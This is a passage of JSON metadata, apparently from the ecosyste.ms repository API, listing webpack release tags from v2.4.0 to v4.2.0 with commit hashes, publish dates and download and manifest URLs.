ack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/